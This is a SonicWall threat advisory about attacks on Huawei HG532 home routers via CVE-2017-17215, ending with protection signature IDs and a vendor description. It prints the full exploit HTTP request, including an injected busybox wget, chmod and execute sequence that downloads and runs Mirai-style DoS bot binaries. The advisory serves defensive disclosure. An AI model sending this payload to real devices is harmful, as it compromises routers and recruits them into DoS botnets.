New wave of attacks attempting to exploit Huawei home routers

SonicWall has observed a new wave of attacks targeting Huawei home routers in attempt to exploit the vulnerability CVE-2017-17215.
The attack started by scanning internet-facing IP’s on port 37215 and then attempting to POST the below command:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username=”dslf-config”, realm=”HuaweiHomeGateway”, nonce=”88645cefb1f9ede0e336e3569d75ee30″, uri=”/ctrlt/DeviceUpgrade_1″, response=”3612f843a42db38f48f59d2a3597e19c”, algorithm=”MD5″, qop=”auth”, nc=00000001, cnonce=”248d1a2560100669″
xml version=”1.0″
><s:Envelope xmlns:s=”” s:encodingStyle=””><s:Body><u:Upgrade xmlns:u=”urn:schemas-upnp-org:service:WANPPPConnection:1″><NewStatusURL>$(/bin/busybox wget -g -l /tmp/binary -r /bins/mips
/bin/busybox chmod 777 * /tmp/binary
/tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Once the vulnerability is exploited successfully on the target router, the following shell commands will be executed on the target router:
/bin/busybox wget -g -l /tmp/binary -r /bins/mips // Download and save file
At the time of writing this article, malware download site is active in delivering payloads to the exploited routers. It provides support for a wide range of target architectures, including mips, arm, x86,mpsl, ppc, sh4, m68k and others.



/tmp/binary huawei // Execute file

When executed, these binaries connect to their CnC, can receive commands to conduct various types of DoS such as UDP DoS and TCP DoS attacks against a given target.

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13151 Huawei HG532 Remote Command Execution
GAV: (Cloud Id: 71637770) Mirai.O (Trojan)
GAV: (Cloud Id: 71634637) Mirai.O (Trojan)
GAV: (Cloud Id: 71637780) AELtrojan (Trojan)
GAV: (Cloud Id: 71636342) SMMR1 (Trojan)
GAV: (Cloud Id: 71637710) SMMR1 (Trojan)
GAV: (Cloud Id: 71638263) AELtrojan (Trojan)
GAV: (Cloud Id: 71636734) Mirai.O (Trojan)
GAV: (Cloud Id: 71637583) Mirai.O (Trojan)
GAV: (Cloud Id: 71635399) Mirai.O (Trojan)
GAV: (Cloud Id: 71636734) Mirai.O (Trojan)
Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.